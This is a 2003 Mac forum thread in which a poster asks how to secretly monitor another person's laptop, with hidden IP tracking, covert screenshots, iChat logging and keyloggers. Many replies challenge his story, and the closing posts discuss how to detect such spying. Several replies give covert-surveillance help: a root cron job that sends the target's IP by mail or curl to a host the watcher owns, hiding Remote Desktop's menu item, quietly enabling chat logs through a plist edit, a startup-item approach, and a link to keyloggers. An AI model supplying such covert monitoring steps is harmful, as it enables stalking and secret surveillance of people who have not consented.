Remotely Targeting a Mac OSX user
brainchild2b
Grizzled Veteran
Join Date: Sep 2000
Location: The Basement
Aug 2, 2003, 04:39 AM
 
I'll be honest. We're trying to remotely target a macos x user to monitor some illegal activities that are taking place through networks associated with us. All ethics aside:

We need to be able to dynamically track his ip, possible solutions are installing a hidden no-ip client through the command line.

We'd also like to somehow be able to at least view his screen on command if not control it.

Any monitoring ideas you have, maybe applescript to email us his new ip? (what email server would this use) he doesn't use mail.app or check mail on this machine outside of a web browser.

Anybody has experience with this? What do you recommend? The important thing is having his ip update to a service like no-ip to be able to "follow" the user.

Are there any keystroke recorders for this?

Also he can't know any of this is installed. While he's not overly paranoid he'd notice the usual signs. Pretty much anything that doesn't show up in applications, login items, or the menubar won't alert him.

Ideas? Experiences? Please share.
     
trusted_content
Dedicated MacNNer
Join Date: Nov 2002
Aug 2, 2003, 05:13 AM
 
Do you have physical access to the machine?

If you do, installing a dyndns client would let you track his IP.

As to the other things, I don't know.

And if you intend to set this all up remotely, what you're basically asking for is instructions on attaining remote root on an OS X box. And I doubt anyone's gonna help you there.
I offer strictly b2b web-based server-side enterprise solutions for growing e-business trusted content providers ;]
     
Cipher13
Registered User
Join Date: Apr 2000
Aug 2, 2003, 05:26 AM
 
This is illegal, from what I can gather. What is the exact arrangement?

Networks "associated" with you? You have no business doing this, as far as I can tell, from the limited information you have provided.

You'd pay dearly if you did this to me - so I'd be careful with whatever you do to this guy.

I don't think it's a good idea. Use the normal channels; what kind of "illegal" activities is he partaking in? Why is it your business in the first place? Do you know that it's him?
     
brainchild2b  (op)
Grizzled Veteran
Join Date: Sep 2000
Location: The Basement
Aug 2, 2003, 05:26 AM
 
I have access to the physical machine, I also have access to root. Basically I'm just looking for stuff to help me monitor it remotely.

Anything out there to take screenshots on command invisible to the user?

Also how about an applescript to turn on ichat logs
     
brainchild2b  (op)
Grizzled Veteran
Join Date: Sep 2000
Location: The Basement
Aug 2, 2003, 05:28 AM
 
First of all the reason I posted the "ethics aside" thing at the top was so somebody wouldn't start in on talking about ethics.

Don't change the topic.

1. The machine is property of one of my clients (paying me to monitor a user of his machine)
2. I can monitor my machine if I want
3. We've already consulted a legal team beforehand.
4. Don't post in the thread and waste my time, "you'd pay dearly if you did this to me" has nothing to do with the thread.
5. Since you seem to want to make it clear that you're elite, and nobody could get away with monitoring your box, share your wealth.

As far as monitoring we have not done too much with OS X monitoring thus far. I'm very familiar with monitoring throughout UNIX and Windows environments. We successfully caught everyone and I've never "paid dearly". Which is aside from the issue. This is something that is done as part of our company. We mostly contract with government offices in the US and Canada to monitor targets or "wanted" persons.

back to the topic..
( Last edited by brainchild2b; Aug 2, 2003 at 05:35 AM. )
     
Cipher13
Registered User
Join Date: Apr 2000
Aug 2, 2003, 05:35 AM
 
Originally posted by brainchild2b:
First of all the reason I posted the "ethics aside" thing at the top was so somebody wouldn't start in on talking about ethics.

Don't change the topic.

1. It's my computer the user is on
2. I can monitor my machine if I want
3. We've already consulted a legal team beforehand.

back to the topic..
Well, putting "ethics aside" isn't really a great option, is it? You could have explained those three points in your original post. I didn't change the topic at all.

Given that, well, why don't you install Timbuktu or VNC on the machine, for remote monitoring? That way you can monitor basically everything taking place.

I'm sure there's a way to take a screenshot via the command line, but I don't know it, unfortunately.

What's the deal with monitoring the IP address? Is this user "borrowing" your system or something, and roaming? Or are they using it in a fixed location? Or what? I'm a little confused as to the situation.

But, eh. You can download a keylogger for OSX, but that's pretty immoral, IMO - your call.

Check out VNC or TB2.
     
Cipher13
Registered User
Join Date: Apr 2000
Aug 2, 2003, 05:38 AM
 
Originally posted by brainchild2b:
First of all the reason I posted the "ethics aside" thing at the top was so somebody wouldn't start in on talking about ethics.

Don't change the topic.

1. The machine is property of one of my clients (paying me to monitor a user of his machine)
2. I can monitor my machine if I want
3. We've already consulted a legal team beforehand.
4. Don't post in the thread and waste my time, "you'd pay dearly if you did this to me" has nothing to do with the thread.
5. Since you seem to want to make it clear that you're elite, and nobody could get away with monitoring your box, share your wealth.

As far as monitoring we have not done too much with OS X monitoring thus far. I'm very familiar with monitoring throughout UNIX and Windows environments. We successfully caught everyone and not had it traced back to us. Which is aside from the issue. This is something that is done as part of our company. We mostly contract with government offices in the US and Canada to monitor targets or "wanted" persons.

back to the topic..
"Edited to add hostility" - so mature, aren't you.

4. Yes, it is relevant; because you want to be careful that the victim of this action doesn't lash back. They might be rather angry about the situation. Something to consider.

5. Where, on earth, did I imply that? Nevermind. It's off-topic. I didn't imply it - if you wanna discuss this further, make it private.

Anyway, what kind of monitoring do you require? Tracking website visits? Conversations? Emails? This all depends greatly on what you want to monitor.
     
brainchild2b  (op)
Grizzled Veteran
Join Date: Sep 2000
Location: The Basement
Aug 2, 2003, 05:39 AM
 
Thanks for the input.

Here is what I'm working with without going into great detail:

*The user is on a Mac OS 10.2 Powerbook

*We have access to the physical machine every so often.

*Keylogging isn't as important, and most of the loggers I've looked at don't seem to be designed very solid.

*We want to monitor the user's AOL Instant Messenger chats. The user is on iChat. Logging is turned off.

*We need to have his IP updated to a dynamic DNS service. This must be transparent, no errors, nothing obvious that would tip the user off.

We want to make sure the user doesn't know.
     
Cipher13
Registered User
Join Date: Apr 2000
Aug 2, 2003, 05:47 AM
 
Originally posted by brainchild2b:
Thanks for the input.

Here is what I'm working with without going into great detail:

*The user is on a Mac OS 10.2 Powerbook

*We have access to the physical machine every so often.

*Keylogging isn't as important, and most of the loggers I've looked at don't seem to be designed very solid.

*We want to monitor the user's AOL Instant Messenger chats. The user is on iChat. Logging is turned off.

*We need to have his IP updated to a dynamic DNS service. This must be transparent, no errors, nothing obvious that would tip the user off.

We want to make sure the user doesn't know.
That could be quite difficult. I just searched through the iChat plists, and it doesn't look like logging can be enabled by writing a default, which would be the nicest, most transparent option (defaults write com.apple.iChat.plist etc etc), but I might have missed it.

I just had a go, and it doesn't look like iChat is scriptable? I thought it was?

Eh, I don't know AppleScript well enough to help there anyway. Sorry. Maybe see if there's a command line client for dyndns to update the IP, as somebody suggested.
     
Chuckit
Clinically Insane
Join Date: Oct 2001
Location: San Diego, CA, USA
Aug 2, 2003, 05:57 AM
 
Originally posted by brainchild2b:
Anything out there to take screenshots on command invisible to the user?
I don't think there's normally a way to do this, but Apple has sample code to take a screenshot on their developer Web site. I'm not sure how you are at programming, but I'd imagine it could be pretty easily adapted to suit your purposes. (I don't recall offhand how the tool works, exactly -- it may not need adapting at all.)
Chuck
___
"Instead of either 'multi-talented' or 'multitalented' use 'bisexual'."
     
mmurray
Grizzled Veteran
Join Date: Sep 2000
Location: Adelaide, Australia
Aug 2, 2003, 07:57 AM
 
Originally posted by Cipher13:


I'm sure there's a way to take a screenshot via the command line, but I don't know it, unfortunately.

Go into terminal and type `screencapture'
Courtesy of Mac OS X Hacks.

Michael
     
LightWaver-67
Senior User
Join Date: Jul 2002
Location: Boston
Aug 2, 2003, 08:28 AM
 
As an "Outside observer" that just viewed this thread for the first time... the original poster of this topic needs to realize that his question appears just as suspect if not MORE than the scenario you are describing.

It's like asking "Hey, how do I break into my own Lexus that has a factory installed security system... I lost my keys"

The knowledge that would be given to you could be used for FAR worse things than checking-up on a client user, so you being a smart person, you MUST be able to see why there might be hesitation to openly discuss it... correct...?

It *might* have been easier to overlook if you STARTED by explaining the problem and letting other power-users tell you the solution... Like:

"I have a client who is worried that one of his users is doing ____________ via AOL on company time, but they have no proof of it. Is there a way that they (we) can monitor his AOL/iChat usage discreetly...? Our legal department says we have the right to do so, but I don't even know HOW to do this without causing suspicion..." or something similar.

The difference being... my example wasn't being vague & evasive of why someone would do that... I don't have a solution for you... I'm just a GUI-type user. Sorry, but I just wanted to add my 2-cents to see if I could help you see WHY people responded with slight distrust. I'm sure you have to see it too, right...?

Hopefully, you get to stop or catch whatever it is he/she is doing that is upsetting his/her boss. Good luck.

- Scott
     
GENERAL_SMILEY
Mac Enthusiast
Join Date: May 2002
Aug 2, 2003, 10:06 AM
 
Not unrelated, but more of a theoretical question for developers - Is it possible to install Remote Desktop, then make its preference pane invisible, and its menu bar item (which is annoying anyway) never appear?

That would be your best solution, you could monitor the computer in real time, install further software remotely etc...
     
Art Vandelay
Professional Poster
Join Date: Sep 2002
Location: New York, NY
Aug 2, 2003, 01:58 PM
 
Yes, ARD is the better way to go. I'm pretty sure you can hide its menu item. I know you can observe a machine without the user knowing. You can easily install items remotely with it using packages. You'd be able to take screen shots with it. To hide the pref pane, move it out of the pref panes folder.
Vandelay Industries
     
JLL
Professional Poster
Join Date: Apr 1999
Location: Copenhagen, Denmark
Aug 2, 2003, 02:35 PM
 
I don't know about the US but monitoring people without telling them is illegal in many countries.
JLL

- My opinions may have changed, but not the fact that I am right.
     
macmike42
Senior User
Join Date: Dec 2001
Aug 2, 2003, 02:46 PM
 
Originally posted by JLL:
I don't know about the US but monitoring people without telling them is illegal in many countries.
It's illegal in the US as well, unless you are Tom Ridge.

BTW, the only way to disable the Remote Desktop menu item is to delete or move it (/System/Library/CoreServices/Menu Extras/RemoteDesktop.menu)

I just renamed mine RemoteDesktop.disabled.menu
"Think Different. Like The Rest Of Us."

iBook G4/1.2GHz | 1.25GB | 60GB | Mac OS X 10.4.2
Athlon XP 2500+/1.83GHz | 1GB PC3200 | 120GB | Windows XP
     
brainchild2b  (op)
Grizzled Veteran
Join Date: Sep 2000
Location: The Basement
Aug 2, 2003, 09:29 PM
 
See, this is exactly what I didn't want to waste this thread on, a discussion about the "legalities". It's exactly why I worded my post like I did.

Thanks to the user for the terminal screencapture tool. This will work well.

The reason I didn't explain the situation in detail is because it is irrelevant. I need to monitor a person, the more remote access you can help me gain without them knowing is good. Why do you need to know anything else? The important part is a quick way to setup the command line no-ip to keep the ip address up to date.

I usually only have 5 minutes with the machine at a time.

For the last time don't post about the legalities of it. I'm not going to take legal advice from anyone here, that's what our legal team gets paid for. I came here for Mac advice.
     
Uncle Skeleton
Addicted to MacNN
Join Date: Nov 2002
Location: Rockville, MD
Aug 2, 2003, 10:08 PM
 
the reason it's relevant is because you're asking people for help to do something shady. I don't know if you've ever been in contact with people, but I'll tell you right now, they (especially nerds) don't enjoy being in the dark about things. the more mysterious you make it, the more they want to know what you're hiding. If you really wanted to avoid discussing the implications of your request, you would have made up a more believable scenario in the first place than just "all ethics aside"
     
brainchild2b  (op)
Grizzled Veteran
Join Date: Sep 2000
Location: The Basement
Aug 2, 2003, 11:56 PM
 
Well my goal wasn't to lie. Lying causes problems. So if it's a problem asking for advice I can take my OS X questions elsewhere.

I'm working on modifying the noip command line client so that I can insert a CD, run the installer and reboot the machine. Without having to modify the code on that machine.

It's easy enough to write a perl script that does this automatically.
     
Zimphire
Baninated
Join Date: Jul 2002
Location: The Moon
Aug 3, 2003, 12:39 AM
 
*We want to monitor the users AOL Instant Messenger chats. The user is on iChat. Logging is turned off.


I can understand wanting to know if this person is using AIM when he isn't supposed to, but trying to find out what he is saying on there isn't really needed. If it is, I think the reasoning you want to do this is going beyond what you are describing.

BTW you can't start a public thread, and demand people only post what you want them to. Well you can, but don't be surprised if no one listens. Esp when acting shady and suspicious.
     
moonmonkey
Professional Poster
Join Date: Jan 2001
Location: Australia
Aug 3, 2003, 06:19 AM
 
Originally posted by brainchild2b:
I'll be honest. We're trying to remotely target a macos x user to monitor some illegal activities that are taking place through networks associated with us. All ethics aside:

We need to be able to dynamically track his ip, possible solutions are installing a hidden no-ip client through the command line.

We'd also like to somehow be able to at least view his screen on command if not control it.

Any monitoring ideas you have, maybe applescript to email us his new ip? (what email server would this use) he doesn't use mail.app or check mail on this machine outside of a web browser.

Anybody has experience with this? What do you recommend? The important thing is having his ip update to a service like no-ip to be able to "follow" the user.

Are there any keystroke recorders for this?

Also he can't know any of this is installed. While he's not overly paranoid he'd notice the usual signs. Pretty much anything that doesn't show up in applications, login items, or the menubar won't alert him.



You obviously are having problems with your wife. If your relationship is not working out, revenge will not make you feel any better, divorce her and move to Thailand.

Ideas? Experiences? Please share.
     
Lordie
Fresh-Faced Recruit
Join Date: May 2001
Aug 3, 2003, 06:34 AM
 
Originally posted by brainchild2b:
I'll be honest. We're trying to remotely target a macos x user to monitor some illegal activities that are taking place through networks associated with us.

We need to be able to dynamically track his ip, possible solutions are installing a hidden no-ip client through the command line.
I don't understand. Is the user on a network associated with you? If so, you don't need to track his IP all surreptitiously, all you'd need to do is check whatever is running dhcpd for his lease info. If the user is hopping around, using different static IPs each time, why aren't you just looking for his MAC address on the line?

Is the user logging in to machines on your network, or accessing info hosted on machines therein? If that's the case, you'd be far better off monitoring access from the server, not the client.

You seem particularly interested in AIM chat logs. AIM chat for the most part is unencrypted. If the user is on your network why aren't you just monitoring his network traffic via any number of network monitoring services available to you?

Have you tried just -- get ready for this -- enabling logging on AIM? I mean, really. How many of you would notice if someone turned logging on or off on you? It's not like it flashes a big, green banner saying "OMG! Your computer is logging your conversations!" Set the logdir to ~/Library/Application Support/iChat/Conversations or something similarly innocuous, and I'd bet the user would never notice.

You apparently have experience in "monitoring" in UNIX, and possibly some perl background. If you want his IP badly enough, why not set up a cron job as root? Have it try to ping something every few minutes. If successful, send an email to

Code:
ifconfig |grep 'inet ' | awk '{print $2}' | mail [email protected] -s "My IP addresses"
Better yet, use curl:
Code:
curl --interface en0 -fs --url http://www.somehostyouown.com/foo.php?`sneaky ip getting script goes here` -o /dev/null
curl --interface en1 -fs --url http://www.somehostyouown.com/foo.php?`sneaky ip getting script goes here` -o /dev/null
I suppose you could leave out the "--interface interface" part. Every few minutes, have the user's machine make those requests. Grep your http error logs for foo.php, and the last one in the list is the most recently active IP. All this no-ip hacking is like using a chainsaw to whittle a toothpick.

But like I said, I don't understand. If the user is doing stuff across networks you own, all this spy vs. spy stuff is needless. If they're not accessing stuff across networks you own, why do you specify that there are illegal activities going on across networks 'associated with you'?

Help us help you. Let's establish what granularity of information you need. VNC, as others have mentioned, will tell you everything, but it comes at a hell of a price. If all you need are chat logs, say so. If you need chat logs and something else, say that.
     
Spliffdaddy
Posting Junkie
Join Date: Oct 2001
Location: South of the Mason-Dixon line
Aug 3, 2003, 06:50 AM
 
keystroke recorder.

Dump the file onto CD or network when you get that "5 minutes" alone with his (her?) computer.
     
LightWaver-67
Senior User
Join Date: Jul 2002
Location: Boston
Status: Offline
Reply With Quote
Aug 3, 2003, 09:47 AM
 
I have a question about what to feed Flying Purple Bunnies... Now, I only want to know about the food to give them, don't ask me about the flying purple bunnies themselves... I want you to ONLY talk about their food.

---

Dude... I (we?) get it... we know you want answers of a specific nature... but to go-off and spout "This is all I want you to respond about" is TOTALLY unrealistic and will yield the opposing results. Hence my current reply.

It is ABSOLUTELY relevant for a user to ask about HOW you're using the knowledge. It's the same as a physicist explaining to a friend "How to make a small nuclear bomb" on a casual level because the "Friend" wants to know what to look for at his new security job.

Wouldn't he feel like SHITE if the friend went-out and built & detonated a bomb based on his info...?

Again, the point is, the stuff you're asking about makes "SOME" people uncomfortable GIVING that info unless they know EXACTLY how it's used... it's not about YOU or distrusting YOU... it's about feeling like a schmuck if the info I or anyone else gave was used in an improper manner by you or ANYONE ELSE reading this PUBLIC thread.

Your answer(s) will appear here regardless... but you STILL need to realize people's initial hesitations and concerns and not just dismiss them.

As I said before... I hope you find your answers... but take a step back and look at this thread objectively... not from YOUR point of view, but from an outsider's.

We're not wrong for discussing the "legality" of this.

------

Last example: "Please, don't go-on about the morality and legality of child porn... I know it's wrong, but we are doing some research on the subject and would like to know where we could download some".

Would you NOT want to interject something about your doubt...?

Peace...
     
Simon
Posting Junkie
Join Date: Nov 2000
Location: in front of my Mac
Aug 3, 2003, 09:55 AM
 
Originally posted by brainchild2b:
Well my goal wasn't to lie. Lying causes problems. So if it's a problem asking for advice I can take my OS X questions elsewhere.
Yeah. I think you should take them somewhere else because most people here aren't as dumb as you believe.

Do you really think we will let you in on the way to do what you ask for if we think you are probably going to use it in an unfair or even illegal way? I won't.

Either you express openly what the hell you are up to (and I better hope it's a decent thing) or you won't get an answer. It's that simple.

"All ethics aside" is a stupid comment btw. Ethics is all about something that isn't put aside from time to time because you would simply like to for the sake of screwing others.

     
Simon
Posting Junkie
Join Date: Nov 2000
Location: in front of my Mac
Aug 3, 2003, 09:57 AM
 
Originally posted by moonmonkey:
You obviously are having problems with your wife. If your relationship is not working out, revenge will not make you feel any better, divorce her and move to Thailand.


LOL.

Yep. Thailand is a very nice place. And they have great food.
     
Arkham_c
Mac Elite
Join Date: Dec 2001
Location: Atlanta, GA, USA
Aug 3, 2003, 02:52 PM
 
Off-topic posts aside, you can always put in a network sniffer. You can go with something like Etherpeek and put his node on a hub with a computer running the sniffer. Nothing goes in or out without your knowledge.


As far as screenshots, just turn on Web sharing, and use the CLI tool "screencapture" to grab screenshots and put them in /Library/WebServer/Documents/, where you can view them from a web browser.
Mac Pro 2x 2.66 GHz Dual core, Apple TV 160GB, two Windows XP PCs
     
goMac
Posting Junkie
Join Date: May 2001
Location: Portland, OR
Aug 3, 2003, 05:44 PM
 
Where I work we had this issue (worker possibly viewing porn). First, we set up ARD on his machine to monitor him. Then, we set up a web filter.
8 Core 2.8 ghz Mac Pro/GF8800/2 23" Cinema Displays, 3.06 ghz Macbook Pro
Once you wanted revolution, now you're the institution, how's it feel to be the man?
     
Xeo
Moderator Emeritus
Join Date: Mar 2001
Location: Austin, MN, USA
Status: Offline
Reply With Quote
Aug 3, 2003, 06:04 PM
 
Tell your client to monitor the IP on the server end. That's the easiest way. Just use the hardware address which you should already know to log the IP.

I assume you have the root password? Whatever you install should be done as root so it can't be killed by the user.
     
brainchild2b  (op)
Grizzled Veteran
Join Date: Sep 2000
Location: The Basement
Status: Offline
Reply With Quote
Aug 3, 2003, 06:07 PM
 
The issue with going into detail wasn't to hide things, or purposely create a "shady" profile of myself. The purpose was to protect an ongoing investigation.

I personally use Mac OS X in work I do related to these types of events. The sad thing is (embarrassed to admit) I haven't taken the time to properly learn Apple's latest and greatest operating system. I'm finding out more and more that I can just use PERL or any of the standard unix tools I'm familiar with.

We can enable iChat logging just fine, I wasn't clear about that. I have remote SSH access to the target's machine as of now. I was just hoping to enable logging remotely rather than wait a few days before I had direct access. It would also have been nice to turn it on and off. So as to have the ability to keep the user from knowing.

The person is connected to our LAN when in the client's office. They are aware that the office network "could" be monitored and none of the activities take place then. My client owns a dialup network. When the target leaves the office he takes the laptop and connects to the dialup network via the laptop. Even though we have full access to the dialup network it's still too much trouble to have the network engineers monitor his changing IP. This is when we decided to go with a simple noip or dyndns setup.

We have full rights and have gone through all the channels to monitor this user. We are a contract based company to corporations and government responsible for helping them get the digital evidence on someone. The individual in question will be spending time in jail, we're just being paid to aid the process, and secure evidence.

That's as detailed as I'm going to get. I'm still having trouble getting the no-ip perl scripts working.

I'd like something that I could just drop into the startupitems and have it run the command line no-ip. Just simple drag and drop (I could preconfig the config file). Does anybody have any code like this for Mac OS X already?

Thanks again for your time.
     
Lordie
Fresh-Faced Recruit
Join Date: May 2001
Aug 3, 2003, 06:27 PM
 
Recently posted by brainchild2b:
I'd like something that I could just drop into the startupitems and have it run the command line no-ip.
Originally posted by brainchild2b:
Pretty much anything that doesn't show up in applications, login items, or the menubar won't alert him.
Make up your mind.
Any of my suggestions could be enabled or disabled remotely. As for enabling/disabling iChat logging remotely, wouldn't it be as easy as killing iChat, opening up ~/Library/Preferences/com.apple.iChat.plist, changing
Code:
<key>AutosaveChats</key> <false/>
to <true/>? It works for me.

If you insist on continuing your effort to get some no-ip client running as a startup item, you really should make a new thread. The specifics of your original queries have been answered.
     
OwlBoy
Addicted to MacNN
Join Date: Nov 1999
Location: Madison, WI
Status: Offline
Reply With Quote
Aug 3, 2003, 09:35 PM
 
Not everything that is made to load on startup has to go in the login items...

-Owl
     
mitchell_pgh
Posting Junkie
Join Date: Feb 2000
Location: Washington, DC
Aug 3, 2003, 09:48 PM
 
Ummm, why don't you just monitor his network activity? We do it all the time at the university when we need to make sure people are doing what they should/shouldn't be doing.

If you have physical access to the network, you can basically track EVERYTHING they do via the network.
     
mitchell_pgh
Posting Junkie
Join Date: Feb 2000
Location: Washington, DC
Aug 3, 2003, 09:55 PM
 
Couldn't you just write a shell script that would access an image on your server and also write a shell script for your system that looks for an IP accessing that one image/file (it could check every 10 seconds or so)?

It's a dirty way to do it, but it would work...

If the guy is dumb, just install snort on his system...
     
gorgonzola
Admin Emeritus
Join Date: Nov 2000
Location: New Yawk
Aug 4, 2003, 01:21 AM
 
For something that will initialize on startup, you need to write a StartupItem...see examples in /System/Library/StartupItems and place your custom item in /Library/StartupItems. You can put pretty much anything here. Search Apple for info on how to create StartupItems.

You could use OS X VNC from redstonesoftware for GUI access, because it can be enabled remotely.

I'm very familiar with monitoring throughout UNIX and Windows environments.
Then just use your Unix techniques to do it. They will almost all work.

Incidentally, it is a little rude to request help with security issues while demanding that no one ask any questions about the motives. I'm sure you would appreciate this skepticism if that user came on here and asked how to disable all the spyware on his computer and install a keystroke logger on YOUR computer. Both sides use similar techniques and it's unclear when people ask for tech support which side they're on; when they're this aggressive about not giving out any specifics, it's only natural to be suspicious. People who were suspicious had the best of intentions. I'm giving you the benefit of the doubt and assuming that you're not lying about working for a security firm, but you should really be aware of what outsiders would immediately think before posting a query like this.

[edit: after rereading this thread, I'm increasingly uncomfortable with sharing much security information, so I've removed some of the details of my post. The story seems a little odd, since most surveillance on OS X would be Unix-based, and brainchild2b is supposedly a Unix security expert. Also, if the guy's on your network, the IP tracking should be trivial for your network people (who are presumably assisting). All of the tips I removed are Unix-related, and if you're not lying, then you should know about them anyway, since anyone with intermediate-level knowledge of Unix would think of them easily.]
"Do not be too positive about things. You may be in error." (C. F. Lawlor, The Mixicologist)
     
Moose
Senior User
Join Date: May 2001
Status: Offline
Aug 4, 2003, 08:31 AM
 
Originally posted by gorgonzola:
Code:
ls | gzip -9 | ssh [email protected] dd of=ls-output.gz
and that creates a ls-output.gz file with the output of the 'ls' command on the *remote* server without leaving any trace at all on the local machine.
This requires, of course, ssh auth keys to be generated and installed properly.

man 1 ssh-keygen
     
gorickey
Posting Junkie
Join Date: Nov 2001
Location: Retired.
Status: Offline
Aug 4, 2003, 08:44 AM
 
This thread has caused me NOT to use iChat at work anymore...

     
brainchild2b  (op)
Grizzled Veteran
Join Date: Sep 2000
Location: The Basement
Status: Offline
Aug 4, 2003, 10:00 AM
 
That's another interesting point, does anyone know a unix based keystroke recorder that works well with Mac OS X? I assume there wouldn't be any issues between mac os x gui and the command line, and things would get recorded neatly?

has anybody tried this before?
     
gorickey
Posting Junkie
Join Date: Nov 2001
Location: Retired.
Status: Offline
Aug 4, 2003, 10:08 AM
 
Originally posted by brainchild2b:
That's another interesting point, does anyone know a unix based keystroke recorder that works well with Mac OS X? I assume there wouldn't be any issues between mac os x gui and the command line, and things would get recorded neatly?

has anybody tried this before?
Try this link for some information:

http://keystroke-loggers.staticusers.net/mac.shtml
     
gorgonzola
Admin Emeritus
Join Date: Nov 2000
Location: New Yawk
Status: Offline
Aug 4, 2003, 01:21 PM
 
Originally posted by Moose:
This requires, of course, ssh auth keys to be generated and installed properly.

man 1 ssh-keygen
I said that directly before the part you quoted.



Since he's supposedly familiar with Unix more than Mac OS X I assumed he knew something about RSA keys.
"Do not be too positive about things. You may be in error." (C. F. Lawlor, The Mixicologist)
     
utidjian
Senior User
Join Date: Jan 2001
Location: Mahwah, NJ USA
Status: Offline
Aug 4, 2003, 03:51 PM
 
Originally posted by brainchild2b:
I'll be honest.
No! I don't think you are being honest. Your entire series of posts on this topic has a distinctly unprofessional flavor. While you claim to be doing this as a professional you are asking completely naive questions about basic security and monitoring techniques.

If you are a professional and you and your firm perform these "monitoring" services for the government and industry why are you asking here on a public forum? Your "target" could be reading this same forum.

If, as you claim, you are trying to monitor this person's activity with the blessing of the organization that owns and operates at least part of the network the "target" is using... it is completely trivial to determine their IP address at ALL times. Dialup servers can ALL do this basic logging function by default. Why did you say that "it's still too much trouble to have the network engineers monitor his changing IP"?

If, as you claim, you already have root access then you can monitor all activity on that machine either locally or via the internet. This is also trivial and you can take all the time you like to do it while the "target" is connected to the network(s) you control. Why do you claim that you only have 5 minutes?

If, as you claim, you need to log ALL instant message, email, and web surfing activity AND the "target" is connected to network(s) you control it is also trivial to collect and log all this activity. Even web based email accessed via SSL does not need to be done "locally" (on the "target's" machine). It will take a bit more work to decrypt it though. Why are you trying to install keylogging and monitoring software directly on the "target's" machine?

If, as you claim, you need to keep all of this completely secret from the "target" then why insist on installing spyware on the "target's" machine when you don't have to? It is also trivial to hide programs and log files from the casual user... especially in Mac OS X. As someone who claims to have experience with Unix you would know this. Why are you asking for ways to hide your activity?

If, as you claim, you have consulted legal counsel on this particular problem... then they would have told you that you can only monitor certain things and only if the machine and/or network belongs to the client firm. Does the machine belong to your client or to the "target"? Why are you trying to monitor activity when it is NOT connected to the client's network(s)?

If, as you claim, you are doing this legally... why are you asking others to set aside their ethics to help you?

If, as you claim, you are being honest (even partially)... I suggest you and/or your firm look for a different line of work because you are not very good at it.

I don't think you are being honest... there are just too many holes in your cover story. I think the only things you have been honest about are that you are trying to spy on someone and that you have set YOUR ethics aside. I think you are a mean, stupid and miserable little person.

Sincerely
-DU-...etc...
     
trusted_content
Dedicated MacNNer
Join Date: Nov 2002
Status: Offline
Aug 4, 2003, 04:24 PM
 
Originally posted by utidjian:
Now that there is a zinger. Quality work, sir.
I offer strictly b2b web-based server-side enterprise solutions for growing e-business trusted content providers ;]
     
mismith
Junior Member
Join Date: Apr 2001
Status: Offline
Aug 4, 2003, 08:28 PM
 
"putting all ethics aside..." here is some fuel for the "flame"

Google returns this gem from a version tracker review.
_______________________________________
Anybody who believes... [ Views: 8 ]
Feedback Type: Commentary
Contributed by: brainchild2b Thursday, November 07 2002 @ 09:11 AM PST

Anybody who believes they will get rid of their data with software is just kidding themselves. I can get anything, anything off your harddrive with an electron Gun. Even if it was erased and written over 10 years ago. Don't store supersensitive data on your computer that's what your head is for.
_______________________________________

reference:
http://www.versiontracker.com/dyn/mo...x/16844&page=3
     
Zimphire
Baninated
Join Date: Jul 2002
Location: The Moon
Status: Offline
Aug 5, 2003, 12:46 PM
 
Originally posted by mismith:
"putting all ethics aside..." here is some fuel for the "flame"

Google returns this gem from a version tracker review.
_______________________________________
Anybody who believes... [ Views: 8 ]
Feedback Type: Commentary
Contributed by: brainchild2b Thursday, November 07 2002 @ 09:11 AM PST

Anybody who believes they will get rid of their data with software is just kidding themselves. I can get anything, anything off your harddrive with an electron Gun. Even if it was erased and written over 10 years ago. Don't store supersensitive data on your computer that's what your head is for.
_______________________________________

reference:
http://www.versiontracker.com/dyn/mo...x/16844&page=3
Of course that could be anyone. But then again the (2b) is pretty abnormal.

What a tool.
     
EnVoy
Mac Enthusiast
Join Date: Dec 2002
Location: Newport Beach, CA
Status: Offline
Aug 5, 2003, 12:49 PM
 
So, the next logical question. How does one using OS X know/find out if the above mentioned methods are being used against him/herself?
     
gorgonzola
Admin Emeritus
Join Date: Nov 2000
Location: New Yawk
Status: Offline
Aug 5, 2003, 01:15 PM
 
Originally posted by EnVoy:
So, the next logical question. How does one using OS X know/find out if the above mentioned methods are being used against him/herself?
Little Snitch from Objective Development will notify you of any outgoing connection your computer is trying to make so you can allow/deny it. That would notify you if sendmail is trying to send something out and then you would become suspicious because you don't run sendmail. It's $25 software though.

Also, you firewall everything you're not using, so unauthorized servers on your machine wouldn't really work. Then you have to go through network traffic (maybe with something like ntop), log firewall activity, stuff like that.
"Do not be too positive about things. You may be in error." (C. F. Lawlor, The Mixicologist)
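A self-audit along the lines of the answer above, as an added example that is not part of any poster's message: it flags startup items missing from a baseline and listening ports outside an allowlist. The function names, the allowlist and the sample `netstat` lines are constructed assumptions.

```shell
#!/bin/sh
# Added example (not from the thread). Sample data and allowlists are constructed.

# Print entries in a StartupItems directory that are missing from a baseline.
#   $1 = directory to audit, e.g. /Library/StartupItems
#   $2 = baseline file, one approved item name per line
unexpected_startup_items() {
    dir=$1
    baseline=$2
    [ -d "$dir" ] || return 0
    for item in "$dir"/*; do
        [ -e "$item" ] || continue
        name=$(basename "$item")
        grep -qxF -- "$name" "$baseline" 2>/dev/null || printf '%s\n' "$name"
    done
}

# Read `netstat -an` output on stdin and print each listening local port
# that is not in the space-separated allowlist given as $1.
unexpected_listeners() {
    awk -v allowed="$1" '
        BEGIN { n = split(allowed, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        $NF == "LISTEN" {
            port = $4
            sub(/^.*[.:]/, "", port)   # macOS prints addr.port, Linux addr:port
            if (!(port in ok) && !(port in seen)) { seen[port] = 1; print port }
        }'
}

# Constructed sample in the macOS `netstat -an` layout.
sample_netstat() {
    cat <<'EOF'
Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)
tcp4       0      0  *.22                   *.*                    LISTEN
tcp4       0      0  *.5900                 *.*                    LISTEN
tcp4       0      0  127.0.0.1.631          *.*                    LISTEN
tcp4       0      0  *.25                   *.*                    LISTEN
tcp4       0      0  192.0.2.10.49200       198.51.100.7.443       ESTABLISHED
EOF
}

# Demo on the sample: ssh (22) and printing (631) are expected here.
sample_netstat | unexpected_listeners "22 631"
```

On a real machine, pipe `netstat -an` into `unexpected_listeners` and point `unexpected_startup_items` at `/Library/StartupItems` with a baseline recorded while the system was known to be clean.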
     
Angus_D
Addicted to MacNN
Join Date: Mar 2000
Location: London, UK
Status: Offline
Aug 5, 2003, 01:57 PM
 
Or you just make sure nobody else has the root password to your box.
     
gorgonzola
Admin Emeritus
Join Date: Nov 2000
Location: New Yawk
Status: Offline
Aug 5, 2003, 02:15 PM
 
Originally posted by Angus_D:
Or you just make sure nobody else has the root password to your box.
True, but if anyone has physical access to the box without root, they could easily reset the root password to something. You're right though.
